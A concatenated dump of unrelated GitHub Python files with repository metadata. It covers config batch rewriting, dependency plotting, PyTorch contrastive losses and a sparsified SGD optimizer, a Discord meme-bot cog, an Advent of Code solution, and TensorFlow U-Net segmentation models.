args = parser.parse_args()\n files = glob.glob('*.work')\n\n for f in files:\n fp = open(f, 'r')\n\n s = ''\n\n for l in fp:\n s += l\n\n config = json.loads(s)\n\n config['training']['batch'] = args.batch\n\n sconf = json.dumps(config, indent=4, sort_keys=True)\n\n fconf = open(f.replace(\".work\", \".json\"), 'w')\n fconf.write(sconf + '\\n')\n fconf.close()\n\n os.remove(f)","repo_name":"bejar/Wind","sub_path":"Scripts/fix/fixbatch.py","file_name":"fixbatch.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"240571357","text":"\"\"\"Plot the dependencies of ams.\"\"\"\n\nimport os\nimport subprocess\nimport ams\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nmodule_to_exclude = \"ams ams.main ams.system ams.core ams.utils numpy\"\nams_root = ams.utils.paths.ams_root()\npypower_path = os.path.join(ams_root, 'solver/pypower')\nfigfolder_path = os.path.normpath(os.path.join(ams_root, '../dev/notes/fig'))\n\nmodule_to_dps = [\"opf\", \"runopf\", \"opf_setup\", \"opf_model\", \"opf_execute\", \"pipsopf_solver\"]\n\nfor module_name in module_to_dps:\n fig_path = os.path.join(figfolder_path, module_name + '.svg')\n file_path = os.path.join(pypower_path, module_name + '.py')\n if os.path.exists(fig_path):\n logger.warning(f\"Figure {fig_path} already exists. Skipping...\")\n else:\n logger.warning(f\"Plotting dependencies of {module_name}...\")\n cmd = f\"pydeps {file_path} -o {fig_path} --exclude-exact {module_to_exclude} --rmprefix 'ams.solver.pypower.'\"\n subprocess.run(cmd, shell=True)\n logger.warning(f\"Done. Figure saved to {fig_path}.\")\n","repo_name":"CURENT/ams","sub_path":"dev/notes/fig/plot_deps.py","file_name":"plot_deps.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"23690549578","text":"# rename this file \"loss_block.py\"\n\n\"\"\" \nCreate the network to disentangle dynamic attributes from static information\n \"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# local import\nfrom .utils import share_encoding_mean,share_encoding_mean_check\n\nclass DenoisingLossDDP(nn.Module):\n\n def __init__(self,hyperparams, num_transforms, batch_size,\n img_loss_type='l2',enc_loss_type='simclr'):\n super(DenoisingLossDDP, self).__init__()\n self.hyperparams = hyperparams\n self.similarity_f = nn.CosineSimilarity(dim=2)\n self.criterion = nn.CrossEntropyLoss(reduction=\"sum\")\n\n self.num_transforms = num_transforms\n self.batch_size = batch_size\n\n msizes = [2,self.num_transforms,self.num_transforms+1]\n self.masks_neg,self.masks_pos = self.get_masks(msizes,batch_size)\n self.img_loss_type = img_loss_type\n self.enc_loss_type = enc_loss_type\n \n\n def forward(self,pic_set,dec_pics,h):\n hyperparams = self.hyperparams\n simh = []\n simpics = []\n\n N = len(pic_set)\n BS = pic_set[0].shape[0]\n pshape = pic_set[0][0].shape\n shape = (N,BS,) + pshape\n\n # h = h.reshape(N,BS,-1)\n # loss_h = self.compute_enc_loss(h)\n\n # ----------------------\n # -- pair-wise losses --\n # ----------------------\n pic_set = pic_set.reshape(N,BS,-1)\n dec_pics = dec_pics.reshape(N,BS,-1)\n\n # # -- roll the decoded pics --\n\n # # r = torch.cat([dec_pics[-1:],dec_pics[:-1]])\n # # pic_pair = [pic_set,r]\n\n offset_idx = [(i+1)%N for i in range(N)]\n pic_pair = [pic_set,dec_pics[offset_idx]]\n loss_pairs = self.compute_img_loss(pic_pair)\n\n # pic_set = pic_set.reshape(N*BS,-1)\n # dec_pics = dec_pics.reshape(N*BS,-1)\n # pic_pair = [pic_set,dec_pics]\n\n loss_pairs = self.compute_img_loss(pic_pair)\n\n\n # -- across decoded pics --\n # dec_pics = [dec_pic for dec_pic in dec_pics]\n # loss_x = self.compute_img_loss(dec_pics)\n # + hyperparams.x * loss_x\n\n loss = loss_pairs #+ hyperparams.h * loss_h\n return loss\n \n def aggregate(self,h,aux,N,BS):\n agg_fxn = self._agg_fxn\n agg_type = self._agg_type\n if agg_fxn == 'mean':\n return share_encoding_mean(agg_type,h,aux,N,BS)\n elif agg_fxn == 'id':\n return h,aux\n else:\n raise ValueError(f\"Uknown aggregation function [{agg_fxn}]\")\n\n def compute_img_loss(self,sim_i):\n if self.img_loss_type == 'simclr':\n return self.compute_loss_simclr(sim_i)\n elif self.img_loss_type == 'l2':\n return F.mse_loss(sim_i[0],sim_i[1])\n else:\n raise ValueError(f\"Unknown img loss type [{self.img_loss_type}]\")\n \n def compute_enc_loss(self,sim_i):\n if self.enc_loss_type == 'simclr':\n return self.compute_loss_simclr(sim_i)\n elif self.enc_loss_type == 'l2':\n return F.mse_loss(sim_i[0],sim_i[1])\n else:\n raise ValueError(f\"Unknown loss type [{self.enc_loss_type}]\")\n\n def compute_loss_simclr(self,sim_i):\n N = len(sim_i)\n BS = self.batch_size\n Kpos = N*(N-1)*BS\n Kneg = N * BS\n mask_pos = self.masks_pos[N]\n mask_neg = self.masks_neg[N]\n return self.generalized_nt_xent(sim_i,N,BS,Kpos,Kneg,mask_pos,mask_neg)\n\n\n def generalized_nt_xent(self,sim_i,N,BS,Kpos,Kneg,mask_pos,mask_neg):\n \"\"\"\n sim_i [ NumTransforms x BatchSize x EncoderD]\n \"\"\"\n temperature = self.hyperparams.temperature\n\n # compute similarity scores\n if isinstance(sim_i,list):\n s = torch.cat(sim_i,dim=0)\n elif isinstance(sim_i,torch.Tensor):\n s = sim_i.reshape(N*BS,-1)\n else:\n raise TypeError(\"Unknown sim_i type [{}]\".format(type(sim_i)))\n simmat = self.similarity_f(s.unsqueeze(1),s.unsqueeze(0)) / temperature\n pos_samples = simmat[mask_pos].reshape(Kpos,1) # NumA x 1\n neg_samples = simmat[mask_neg].reshape(Kneg,-1) # NumA x NumA-2 (\"same\" and \"1\")\n\n # create logits and labels\n logits = []\n for n in range(N-1):\n logit = torch.cat((pos_samples[n::(N-1)],neg_samples),dim=1)\n logits.append(logit)\n logits = torch.cat(logits,dim=0)\n labels = torch.zeros(Kpos).to(pos_samples.device).long()\n\n # run loss\n loss = self.criterion(logits, labels)\n loss /= Kpos\n return loss\n \n\n def get_masks(self, Nsizes, BS):\n masks_neg,masks_pos = {},{}\n for N in Nsizes:\n mask_neg = self.get_mask_neg(N, BS)\n masks_neg[N] = mask_neg\n masks_pos[N] = self.get_mask_pos(mask_neg)\n return masks_neg,masks_pos\n\n def get_mask_neg(self, num_transforms, batch_size):\n K = num_transforms * batch_size\n mask = np.zeros((K,K), dtype=np.int)\n for n in range(num_transforms-1):\n ones = np.ones(K-batch_size*(n+1))\n dmask = np.diag(ones,(n+1)*batch_size).astype(np.int)\n mask += dmask\n dmask = np.diag(ones,-(n+1)*batch_size).astype(np.int)\n mask += dmask\n mask = np.logical_not(mask)\n np.fill_diagonal(mask,0)\n mask = torch.from_numpy(mask).type(torch.bool)\n return mask\n\n def get_mask_pos(self,mask_sim):\n mask = mask_sim.clone()\n mask = torch.logical_not(mask)\n mask = mask.fill_diagonal_(0)\n return mask\n\n\n","repo_name":"gauenk/cl_gen","sub_path":"lib/layers/denoising/loss_ddp.py","file_name":"loss_ddp.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21590821658","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport pdb\nimport torch\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\n\nimport torch.utils.data.distributed\nfrom torch.optim import Optimizer\n\n\n\n# https://discuss.pytorch.org/t/a-problem-about-optimizer-param-groups-in-step-function/14463\nclass sparsetopSGD(Optimizer):\n def __init__(self, params, lr=0.1, topk=0.1, momentum=0, dampening=0,\n weight_decay=0, nesterov=False, required=True):\n if lr is not required and lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(lr=lr, topk=topk, momentum=momentum, dampening=dampening,\n weight_decay=weight_decay, nesterov=nesterov)\n \n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\n \n super(sparsetopSGD, self).__init__(params, defaults)\n\n \n gradient_size = 0\n for group in self.param_groups:\n for p in group['params']:\n param_state = self.state[p]\n param_state['memory'] = torch.zeros_like(p.data)\n gradient_size += torch.numel(p.data)\n\n self.iteration = 0\n self.gradient_after_topk = torch.zeros(gradient_size)\n self.gradient_before_topk = torch.zeros(gradient_size)\n self.gradient_without_error = torch.zeros(gradient_size)\n self.error = torch.zeros(gradient_size)\n\n def __setstate__(self, state):\n super(sparsetopSGD, self).__setstate__(state)\n for group in self.param_groups:\n group.setdefault('nesterov', False)\n\n @torch.no_grad()\n def step(self, closure=None):\n loss = None\n if closure is not None:\n with torch.enable_grad():\n loss = closure()\n\n #print(\"Length of param_groups: \", len(self.param_groups))\n\n if (len(self.param_groups) > 1):\n raise ValueError(\"TopK sparsification not available for more than one parameter group\")\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n lr = group['lr']\n topk = group['topk']\n\n # lists used in the actual calculation of gradients\n param_size = []\n gradient_shape = []\n gradients = []\n\n\n gradients_without_error = []\n errors = []\n\n for p in group['params']: \n\n param_state = self.state[p]\n if p.grad is None:\n continue\n\n d_p = p.grad\n corrected_gradient = group['lr'] * d_p\n\n # save for \n gradients_without_error.append(torch.flatten(corrected_gradient.detach().clone()))\n\n\n corrected_gradient = param_state['memory'] + corrected_gradient\n\n errors.append( torch.flatten(param_state['memory'].detach().clone()) )\n\n # save gradient shape\n gradient_shape.append(corrected_gradient.shape)\n\n corrected_gradient = torch.flatten(corrected_gradient)\n\n param_size.append(corrected_gradient.size(dim=0))\n gradients.append(corrected_gradient)\n\n if len(gradients) > 0:\n self.gradient_without_error = torch.cat(gradients_without_error, dim=0)\n\n all_gradients = torch.cat(gradients, dim=0)\n self.error = torch.cat(errors, dim=0)\n\n # self.raw_gradient = torch.cat(gradients_error_not_adjusted, dim=0)\n self.gradient_before_topk = all_gradients.detach().clone()\n\n abs_all_gradients = abs(all_gradients)\n\n _, indices = torch.topk(abs_all_gradients, int( (1 - topk) * all_gradients.shape[0]), dim=0, largest=False)\n\n all_gradients[indices] = 0\n\n self.gradient_after_topk = all_gradients.detach().clone()\n\n sparsified_gradients = torch.split(all_gradients, param_size)\n\n\n i = 0\n for p in group['params']:\n param_state = self.state[p]\n if p.grad is None:\n continue\n\n d_p = p.grad\n corrected_gradient = group['lr'] * d_p\n corrected_gradient = param_state['memory'] + corrected_gradient\n\n sparsified_gradient = torch.reshape(sparsified_gradients[i], gradient_shape[i])\n param_state['memory'] = corrected_gradient - sparsified_gradient\n p.data.add_(sparsified_gradient, alpha=-1)\n i += 1\n\n self.iteration += 1 \n return loss","repo_name":"wyxzou/Federated-Learning-PyTorch","sub_path":"src/sparsification.py","file_name":"sparsification.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"38700690256","text":"import logging\nimport random\nimport time\nimport io\nimport os\nimport datetime\nimport concurrent.futures\nimport typing as t\n\nimport discord\nimport discord.ext.commands as commands\nfrom PIL import Image, ImageDraw, ImageSequence, ImageFont\n\nfrom bot.consts import Colors\n\nlog = logging.getLogger(__name__)\nMAX_WALDO_GRID_SIZE = 100\nCRAB_LINE_LENGTH = 58\nCRAB_COMMAND_COOLDOWN = 3\n\ndef pillow_process(args, is_rave, lines_in_text, timestamp):\n # Open crab.gif and add our font\n im = Image.open('bot/cogs/memes_cog/assets/crab.gif')\n fnt = ImageFont.truetype('bot/cogs/memes_cog/assets/LemonMilk.otf', 11)\n \n # Draw text on each frame of the gif\n # Gonna be honest I don't quite understand how it works but I got it from the Pillow docs/issues\n frames = []\n for frame in ImageSequence.Iterator(im):\n d = ImageDraw.Draw(frame)\n w, h = d.textsize(args, fnt)\n # draws the text on to the frame. Tries to center horizontally and tries to go as close to the bottom as possible\n d.text((im.size[0]/2 - w/2, im.size[1] - h - (5 * lines_in_text)), args, font=fnt, align='center',\n stroke_width=bool(is_rave), stroke_fill=Colors.ClemsonOrange, spacing=6)\n del d\n\n b = io.BytesIO()\n frame.save(b, format='GIF')\n frame = Image.open(b)\n frames.append(frame)\n frames[0].save(f'bot/cogs/memes_cog/assets/out_{timestamp}.gif', save_all=True, append_images=frames[1:])\n\nclass MemesCog(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n \n @commands.command()\n async def bubblewrap(self, ctx):\n\n msg = ''\n for _ in range(0, 5):\n for _ in range(0, 10):\n msg += '||pop!|| '\n msg += '\\n'\n\n await ctx.send(msg)\n\n @commands.command()\n async def waldo(self, ctx, size=MAX_WALDO_GRID_SIZE):\n\n \"\"\"\n Play Where's Waldo!\n\n Usage: waldo [size = 100]\n \"\"\"\n random_start_letters = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','X','Y','Z']\n\n max_waldo_line_size = 6\n new_line_waldo_chance = 10\n msg = ''\n count = 0\n place = random.randint(0,size)\n\n for i in range(size+1):\n if i == place:\n msg += '||`WALDO`|| '\n count += 1\n else:\n helper = random.randint(0,len(random_start_letters)-1)\n letter = random_start_letters[helper]\n msg += f'||`{letter}ALDO`|| '\n count += 1\n \n new_line = random.randint(0,100)\n\n if new_line < new_line_waldo_chance or count > max_waldo_line_size:\n msg += '\\n'\n count = 0\n\n await ctx.send(msg)\n\n @commands.command()\n async def spongebob(self, ctx, *, args):\n\n \"\"\"\n Spongebob Text\n \"\"\"\n random.seed(time.time())\n args = args.replace('\"', \"'\")\n \n result = ''\n for i in args:\n helper = random.randint(0, 100)\n \n if helper > 60:\n result += str(i).upper()\n else:\n result += str(i).lower()\n\n embed = discord.Embed(title=\"SpOnGeBoB\", color=Colors.ClemsonOrange)\n result2 = ''\n\n # Discord messages can only be 2k characters long, this block accounts for that\n if len(result) >= 1024:\n result2 = result[1024:len(result)]\n result = result[:1023]\n embed.add_field(name=\"TeXt\", value=result, inline=False)\n\n if result2:\n embed.add_field(name=\"tExT\", value=result2, inline=False)\n \n\n await ctx.send(embed=embed)\n\n @commands.command(aliases=['rave', '🦀'])\n @commands.cooldown(1, CRAB_COMMAND_COOLDOWN, commands.BucketType.guild)\n async def crab(self, ctx, is_rave: t.Optional[bool] = True, *, args='Bottom text\\n is dead'):\n \"\"\"\n Create your own crab rave.\n Usage: crab [is_rave=True] [text=Bottom text\\\\n is dead]\n Aliases: rave, 🦀\n \"\"\"\n # crab.gif dimensions - 352 by 200\n # Immediately grab the timestamp incase of multiple calls in a row\n timestamp = datetime.datetime.utcnow()\n msg = await ctx.send('Generating your gif')\n \n # Add new lines for when the text would go out of bounds\n lines_in_text = 1\n while len(args) > (CRAB_LINE_LENGTH * lines_in_text):\n newline_loc = CRAB_LINE_LENGTH * lines_in_text\n # I didn't want to add a newline in the middle of a word\n while not args[newline_loc].isspace():\n newline_loc -= 1\n if newline_loc == CRAB_LINE_LENGTH * (lines_in_text - 1):\n newline_loc = CRAB_LINE_LENGTH * lines_in_text\n break\n\n args = f'{args[:newline_loc]} \\n{args[newline_loc:]}'\n lines_in_text += 1\n \n loop = self.bot.loop\n with concurrent.futures.ProcessPoolExecutor() as pool:\n pil_args = (args, is_rave, lines_in_text, timestamp)\n await loop.run_in_executor(pool, pillow_process, *pil_args)\n\n # Attach, send, and delete created gif\n attachment = discord.File(filename=f'out_{timestamp}.gif', fp=f'bot/cogs/memes_cog/assets/out_{timestamp}.gif')\n await ctx.send(file=attachment)\n await msg.delete()\n os.remove(f'bot/cogs/memes_cog/assets/out_{timestamp}.gif')\n\n @commands.command(aliases=['8ball','🎱'])\n async def ball(self, ctx, *, question):\n \"\"\"\n A simple magic 8 ball than can be used with 'ball' or '8ball'\n Example:\n ball Will I have a good day today?\n 8ball Will I have a bad day today?\n \"\"\"\n responses = [\n 'It is certain.',\n 'It is decidedly so.',\n 'Without a doubt.',\n 'Yes – definitely.',\n 'You may rely on it.',\n 'As I see it, yes.',\n 'Most likely.',\n 'Outlook good.',\n 'Yes.',\n 'Signs point to yes.',\n 'Reply hazy, try again.',\n 'Ask again later.',\n 'Better not tell you now.',\n 'Cannot predict now.',\n 'Concentrate and ask again.',\n 'Don\\'t count on it.',\n 'My reply is no.',\n 'My sources say no.',\n 'Outlook not so good.',\n 'Very doubtful.'\n ]\n embed = discord.Embed(title='🎱', description= f'{random.choice(responses)}',color = Colors.ClemsonOrange)\n await ctx.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(MemesCog(bot))\n","repo_name":"new-zelind/ClemBot","sub_path":"bot/cogs/memes_cog/memes_cog.py","file_name":"memes_cog.py","file_ext":"py","file_size_in_byte":6687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"21194199848","text":"import time\nfrom math import ceil\nfrom math import inf\n\n\ntime1 = time.time()\ndef func():\n input_f = open('input_13.1.txt', 'r')\n input_d = input_f.readlines()\n\n time = int(input_d[0][:-1])\n busses = input_d[1].split(',')\n\n mult = 1\n t = 0\n for i, b in enumerate(busses):\n if b != 'x':\n while (t + i) % int(b) != 0:\n t += mult\n mult *= int(b)\n\n return(t)\n \n\nprint(func())\nprint(\"time: \" + str((time.time() - time1) * 1000) + \"ms\")\n","repo_name":"th3tard1sparadox/aoc","sub_path":"aoc20/13.2.py","file_name":"13.2.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7264699420","text":"from __future__ import division \nimport tensorflow as tf \nslim = tf.contrib.slim \n\ndef conv_residual_block(net, num_features, is_training, is_batch_norm, layer_name):\n \"\"\" Unet_V2 residual conv block \n Inputs: net - input feature map\n num_features - number of features in convolution block\n is_training - boolean whether to train graph or validate/test\n is_batch_norm - boolean whether to have batchnorm activated or not\n layer_name - scope name for layer\n\n Output: net - a feature map \n \"\"\"\n with tf.variable_scope(layer_name):\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, scope='conv%d_2' % int(layer_name[-1]))\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm2')\n shortcut = tf.nn.relu(net)\n net = shortcut\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, scope='conv%d_3' % int(layer_name[-1]))\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm3')\n net = tf.nn.relu(net)\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, scope='conv%d_4' % int(layer_name[-1]))\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm4')\n net = tf.nn.relu(net + shortcut)\n return net\n\ndef conv_bn_relu(net, num_features, is_training, is_batch_norm, scope_name):\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, scope=scope_name)\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm%d'% int(scope_name[-1]))\n net = tf.nn.relu(net)\n return net\n\n\ndef unet_arg_scope(weight_decay=1e-4):\n \"\"\"Defines the Unet arg scope.\n Input: weight_decay - The l2 regularization coefficient\n Output: arg_scope - argument scope of model\n \"\"\"\n with slim.arg_scope([slim.conv2d],\n padding='SAME',\n activation_fn=tf.nn.relu,\n weights_regularizer=slim.l2_regularizer(weight_decay),\n biases_initializer=tf.zeros_initializer()) as arg_sc:\n return arg_sc\n\n##########################################\n# Unet: https://arxiv.org/abs/1505.04597 #\n##########################################\n\ndef Unet(inputs,\n is_training=True,\n num_classes = 2,\n scope='unet'):\n \"\"\" Unet \n Inputs: inputs - input image batch\n is_training - boolean whether to train graph or validate/test\n dropout_keep_prob - probability that each element is kept\n scope - scope name for model\n Outputs: output_map - output logits\n end_points - output dic\n \"\"\"\n\n with tf.variable_scope(scope, 'unet', [inputs]) as sc:\n end_points_collection = sc.name + '_end_points'\n # Collect outputs for conv2d, and max_pool2d.\n with slim.arg_scope([slim.conv2d,slim.conv2d_transpose, slim.max_pool2d],\n outputs_collections=end_points_collection):\n\n ######################\n # downsampling path #\n ######################\n conv1_1 = slim.conv2d(inputs, 64, [3,3], scope='conv1/conv1_1')\n conv1_2 = slim.conv2d(conv1_1, 64, [3,3], scope='conv1/conv1_2')\n pool1 = slim.max_pool2d(conv1_2, [2, 2], scope='pool1')\n\n conv2_1 = slim.conv2d(pool1, 128, [3,3], scope='conv2/conv2_1')\n conv2_2 = slim.conv2d(conv2_1, 128, [3,3], scope='conv2/conv2_2')\n pool2 = slim.max_pool2d(conv2_2, [2, 2], scope='pool2')\n\n conv3_1 = slim.conv2d(pool2, 256, [3,3], scope='conv3/conv3_1')\n conv3_2 = slim.conv2d(conv3_1, 256, [3,3], scope='conv3/conv3_2')\n pool3 = slim.max_pool2d(conv3_2, [2, 2], scope='pool3')\n\n conv4_1 = slim.conv2d(pool3, 512, [3,3], scope='conv4/conv4_1')\n conv4_2 = slim.conv2d(conv4_1, 512, [3,3], scope='conv4/conv4_2')\n pool4 = slim.max_pool2d(conv4_2, [2, 2], scope='pool4')\n\n ##############\n # bottleneck #\n ##############\n conv5_1 = slim.conv2d(pool4, 1024, [3,3], scope='conv5/conv5_1')\n conv5_2 = slim.conv2d(conv5_1, 1024, [3,3], scope='conv5/conv5_2')\n\n ###################\n # upsampling path #\n ###################\n conv6_1 = slim.conv2d_transpose(conv5_2, 512, [2,2], stride=2, scope='conv6/transpose_conv6_1')\n merge_1 = tf.concat([conv6_1, conv4_2], axis=-1, name='merge1') \n conv6_2 = slim.conv2d(merge_1, 512, [3,3], scope='conv6/conv6_2')\n conv6_3 = slim.conv2d(conv6_2, 512, [3,3], scope='conv6/conv6_3')\n\n conv7_1 = slim.conv2d_transpose(conv6_3, 256, [2,2], stride=2, scope = 'conv7/transpose_conv7_1')\n merge_2 = tf.concat([conv7_1, conv3_2], axis=-1, name='merge2')\n conv7_2 = slim.conv2d(merge_2, 256, [3,3], scope='conv7/conv7_2')\n conv7_3 = slim.conv2d(conv7_2, 256, [3,3], scope='conv7/conv7_3')\n\n conv8_1 = slim.conv2d_transpose(conv7_3, 128, [2,2], stride=2, scope = 'conv8/transpose_conv8_1')\n merge_3 = tf.concat([conv8_1, conv2_2], axis=-1, name='merge3') \n conv8_2 = slim.conv2d(merge_3, 128, [3,3], scope='conv8/conv8_2')\n conv8_3 = slim.conv2d(conv8_2, 128, [3,3], scope='conv8/conv8_3')\n\n conv9_1 = slim.conv2d_transpose(conv8_3, 64, [2,2], stride=2, scope = 'conv9/transpose_conv9_1')\n merge_4 = tf.concat([conv9_1, conv1_2], axis=-1, name='merge4') \n conv9_2 = slim.conv2d(merge_4, 64, [3,3], scope='conv9/conv9_2')\n conv9_3 = slim.conv2d(conv9_2, 64, [3,3], scope='conv9/conv9_3')\n\n ###############\n # outpput map #\n ###############\n output_map = slim.conv2d(conv9_3, num_classes, [1, 1], \n activation_fn=None, normalizer_fn=None, \n scope='output_layer')\n\n # Convert end_points_collection into a end_point dict.\n end_points = slim.utils.convert_collection_to_dict(end_points_collection)\n\n return output_map, end_points\n\n\n##############################################\n# FusionNet: https://arxiv.org/abs/1612.05360 #\n###############################################\n\ndef ResidualUnet(inputs,\n num_classes = 2,\n is_training = True,\n is_batch_norm = False,\n scope='fusionNet'):\n \"\"\" Modifided Unet \n Inputs: inputs - input image batch\n is_training - boolean whether to train graph or validate/test\n dropout_keep_prob - probability that each element is kept\n scope - scope name for model\n Outputs: output_map - output logits\n end_points - output dic\n \"\"\"\n with tf.variable_scope(scope, 'fusionNet', [inputs]) as sc:\n end_points_collection = sc.name + '_end_points'\n # Collect outputs for conv2d, and max_pool2d.\n with slim.arg_scope([slim.conv2d, slim.conv2d_transpose, slim.max_pool2d],\n outputs_collections=end_points_collection):\n\n ######################\n # downsampling path #\n ######################\n conv1_1 = conv_bn_relu(inputs, 64, is_training, is_batch_norm, 'conv1/conv1_1')\n conv1 = conv_residual_block(conv1_1, 64, is_training, is_batch_norm, 'conv1')\n conv1_5 = conv_bn_relu(conv1, 64, is_training, is_batch_norm, 'conv1/conv1_5')\n pool1 = slim.max_pool2d(conv1_5, [2, 2], scope='pool1')\n\n conv2_1 = conv_bn_relu(pool1, 128, is_training, is_batch_norm, 'conv2/conv2_1')\n conv2 = conv_residual_block(conv2_1, 128, is_training, is_batch_norm, 'conv2')\n conv2_5 = conv_bn_relu(conv2, 128, is_training, is_batch_norm, 'conv2/conv2_5')\n pool2 = slim.max_pool2d(conv2_5, [2, 2], scope='pool2')\n\n conv3_1 = conv_bn_relu(pool2, 256, is_training, is_batch_norm, 'conv3/conv3_1')\n conv3 = conv_residual_block(conv3_1, 256, is_training, is_batch_norm, 'conv3')\n conv3_5 = conv_bn_relu(conv3, 256, is_training, is_batch_norm, 'conv3/conv3_5')\n pool3 = slim.max_pool2d(conv3_5, [2, 2], scope='pool3')\n\n conv4_1 = conv_bn_relu(pool3, 512, is_training, is_batch_norm, 'conv4/conv4_1')\n conv4 = conv_residual_block(conv4_1, 512, is_training, is_batch_norm, 'conv4')\n conv4_5 = conv_bn_relu(conv4, 512, is_training, is_batch_norm, 'conv4/conv4_5')\n pool4 = slim.max_pool2d(conv4_5, [2, 2], scope='pool4')\n\n\n ##############\n # bottleneck #\n ##############\n conv5_1 = conv_bn_relu(pool4, 1024, is_training, is_batch_norm, 'conv5/conv5_1')\n conv5 = conv_residual_block(conv5_1, 1024, is_training, is_batch_norm, 'conv5')\n conv5_5 = conv_bn_relu(conv5, 1024, is_training, is_batch_norm, 'conv5/conv5_5')\n\n ###################\n # upsampling path #\n ###################\n conv6_up = slim.conv2d_transpose(conv5_5, 512, [2,2], activation_fn=None, normalizer_fn=None, stride=2, scope='conv6/transpose_conv6')\n conv6_up += conv4_5\n conv6_up = tf.nn.relu(conv6_up)\n conv6_1 = conv_bn_relu(conv6_up, 512, is_training, is_batch_norm, 'conv6/conv6_1')\n conv6 = conv_residual_block(conv6_1, 512, is_training, is_batch_norm, 'conv6')\n conv6_5 = conv_bn_relu(conv6, 512, is_training, is_batch_norm, 'conv6/conv6_5')\n \n conv7_up = slim.conv2d_transpose(conv6_5, 256, [2,2], activation_fn=None, normalizer_fn=None, stride=2, scope='conv7/transpose_conv7')\n conv7_up += conv3_5\n conv7_up = tf.nn.relu(conv7_up)\n conv7_1 = conv_bn_relu(conv7_up, 256, is_training, is_batch_norm, 'conv7/conv7_1')\n conv7 = conv_residual_block(conv7_1, 256, is_training, is_batch_norm, 'conv7')\n conv7_5 = conv_bn_relu(conv7, 256, is_training, is_batch_norm, 'conv7/conv7_5')\n\n conv8_up = slim.conv2d_transpose(conv7_5, 128, [2,2], activation_fn=None, normalizer_fn=None, stride=2, scope='conv8/transpose_conv8')\n conv8_up += conv2_5\n conv8_up = tf.nn.relu(conv8_up)\n conv8_1 = conv_bn_relu(conv8_up, 128, is_training, is_batch_norm, 'conv8/conv8_1')\n conv8 = conv_residual_block(conv8_1, 128, is_training, is_batch_norm, 'conv8')\n conv8_5 = conv_bn_relu(conv8, 128, is_training, is_batch_norm, 'conv8/conv8_5')\n\n conv9_up = slim.conv2d_transpose(conv8_5, 64, [2,2], activation_fn=None, normalizer_fn=None, stride=2, scope='conv9/transpose_conv9')\n conv9_up += conv1_5\n conv9_up = tf.nn.relu(conv9_up)\n conv9_1 = conv_bn_relu(conv9_up, 64, is_training, is_batch_norm, 'conv9/conv9_1')\n conv9 = conv_residual_block(conv9_1, 64, is_training, is_batch_norm, 'conv9')\n conv9_5 = conv_bn_relu(conv9, 64, is_training, is_batch_norm, 'conv9/conv9_5')\n\n ###############\n # outpput map #\n ###############\n output_map = slim.conv2d(conv9_5, num_classes, [1, 1], \n activation_fn=None, normalizer_fn=None, \n scope='output_layer')\n\n # Convert end_points_collection into a end_point dict.\n end_points = slim.utils.convert_collection_to_dict(end_points_collection)\n\n return output_map, end_points\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"akaragou/connectomics","sub_path":"unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":11607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39517385092","text":"import math\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import CrossEntropyLoss as CELoss\nfrom torch.nn.functional import linear, normalize\n\n\nclass CrossEntropyLoss(CELoss):\n \"\"\"Rewrite CrossEntropyLoss to support init with kwargs\"\"\"\n\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0, **kwargs):\n super(CrossEntropyLoss, self).__init__(**kwargs)\n\n def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n out = input[0]\n return super().forward(out, target)\n\n\nclass CenterLoss(nn.Module):\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(CenterLoss, self).__init__()\n self.feat_dim = feat_dim\n self.num_classes = num_classes\n self.lambda_c = lambda_c\n self.centers = nn.Parameter(torch.randn(num_classes, 